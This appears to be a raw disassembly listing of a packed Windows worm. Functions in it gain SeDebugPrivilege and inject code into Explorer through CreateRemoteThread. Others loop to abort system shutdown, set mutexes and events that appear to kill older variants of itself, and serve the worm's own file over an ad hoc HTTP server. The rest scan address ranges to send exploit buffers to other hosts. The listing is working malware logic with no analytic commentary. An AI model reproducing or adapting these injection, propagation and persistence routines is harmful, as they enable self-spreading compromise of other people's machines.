push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
push offset byte_314242B8
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2 ; memcpy
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
add esp, 40h
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6 ; memset
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174 ; closesocket
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8 ; LoadLibraryA
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; dword_314210A4
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4 ; GetModuleHandleA
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110 ; FindWindowA
test eax, eax
jnz short loc_31421E65
call dword_31421114 ; GetForegroundWindow
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC ; WriteProcessMemory
push dword_31424FF4
call esi ; dword_3142107C
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi ; dword_3142107C
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm192 ; "uterm19-2"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi ; dword_3142107C
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC ; CreateMutexA
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
push eax
call dword_3142107C ; CloseHandle
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi ; dword_3142107C
push [ebp+var_10]
call esi ; dword_3142107C
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154 ; gethostbyname
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC ; OpenEventA
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi ; dword_314210FC
mov edi, eax
shl edi, 10h
call esi ; dword_314210FC
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; dword_31421168
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; dword_31421168
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi ; dword_31421168
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094 ; Sleep
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4 ; InterlockedIncrement
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; dword_31421168
push 0
push 3
push offset dword_31424D3C
push ebx
call esi ; dword_31421168
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094 ; Sleep
push 2
push ebx
call dword_31421170 ; shutdown
push ebx
call dword_31421174 ; closesocket
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC ; GetFileSize
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C ; CloseHandle
push ebx
push 1
push 2
call dword_31421158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140 ; bind
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144 ; listen
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148 ; accept
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi ; dword_3142113C
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; dword_3142113C
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074 ; DeleteFileA
call sub_31421EFB
push offset aUterm192 ; "uterm19-2"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU192x ; "u19-2x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C ; CreateEventA
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi ; dword_314210A8
push offset aWininet ; "wininet"
call esi ; dword_314210A8
push offset aMsvcrt ; "msvcrt"
call esi ; dword_314210A8
push offset aAdvapi32 ; "advapi32"
call esi ; dword_314210A8
push offset aUser32 ; "user32"
call esi ; dword_314210A8
push offset aUterm192 ; "uterm19-2"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018 ; AbortSystemShutdownA
push 1388h
call dword_31421094 ; Sleep
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi ; dword_314210FC
mov byte ptr [ebp+arg_0+2], al
